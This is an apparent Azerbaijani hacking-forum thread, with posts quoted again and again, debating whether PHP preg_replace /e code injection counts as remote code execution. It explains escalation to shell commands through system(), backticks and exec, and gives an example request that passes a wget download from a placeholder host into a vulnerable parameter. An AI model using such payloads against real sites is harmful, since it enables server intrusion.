Bro axı sənə dedim ki bu RCE deyil..
Bunu sənə misal kimi göndərmişdim və yazmışdım ki bu RCE deyil sadəcə preg_replace i /regex/e kimi işlədəndə ortaya çıxan bir növ php code inj dir və əlavə etmişdim ki buna bənzər hallarda , bunun kimi funksiyalarda çıxa bilər RCE.
Burada olan eynilə eval(); kimi birşeydi.
Sən orada yazdın phpinfo() . Bu bəyəm sistem əmridir ?
Ona görə axırda işlədi ki sən `` (backtick) işlətdin + preg_replace outputu ekrana vurdu.
Çox xahiş edirəm hamıdan nə mövzu açsaz araşdırıb açın.
Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Sitat#41765PuN!Sh3r :
Bro axı sənə dedim ki bu RCE deyil..
Bunu sənə misal kimi göndərmişdim və yazmışdım ki bu RCE deyil sadəcə preg_replace i /regex/e kimi işlədəndə ortaya çıxan bir növ php code inj dir və əlavə etmişdim ki buna bənzər hallarda , bunun kimi funksiyalarda çıxa bilər RCE.
Burada olan eynilə eval(); kimi birşeydi.
Sən orada yazdın phpinfo() . Bu bəyəm sistem əmridir ?
Ona görə axırda işlədi ki sən `` (backtick) işlətdin + preg_replace outputu ekrana vurdu.
Çox xahiş edirəm hamıdan nə mövzu açsaz araşdırıb açın.
Belə götürəndə , çoxdaki marağlı deyil mənə RCE vəya Code İnjection ...
Mənə sadəcə əmrim marağlıdı ...
Code İnjection və RCE - ayıra bilmirəm
Sitat#41765PuN!Sh3r :
Bro axı sənə dedim ki bu RCE deyil..
Bunu sənə misal kimi göndərmişdim və yazmışdım ki bu RCE deyil sadəcə preg_replace i /regex/e kimi işlədəndə ortaya çıxan bir növ php code inj dir və əlavə etmişdim ki buna bənzər hallarda , bunun kimi funksiyalarda çıxa bilər RCE.
Burada olan eynilə eval(); kimi birşeydi.
Sən orada yazdın phpinfo() . Bu bəyəm sistem əmridir ?
Ona görə axırda işlədi ki sən `` (backtick) işlətdin + preg_replace outputu ekrana vurdu.
Çox xahiş edirəm hamıdan nə mövzu açsaz araşdırıb açın.
Belə götürəndə , çoxdaki marağlı deyil mənə RCE vəya Code İnjection ...
Mənə sadəcə əmrim marağlıdı ...
Code İnjection və RCE - ayıra bilmirəm
Mən sadəcə başa salmaq istəyirəm ki, php code inj-i code executiona çevirmək mümkündür ona görə ki system(); , ``, passthru,exec və s. kimi funksiyaları var. Bundan xəbəri olmayan elə biləcək ki ` ls ` yazsa real RCE də listing verəcək. Amma əslində RCE də backtick ə falan ehtiyac yoxdur. Pure commands rulezz yəni sənin misalında wpindex.php?h=wget http://blahhh (wpindex.php?h=`wget http://blahh` yox)
Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..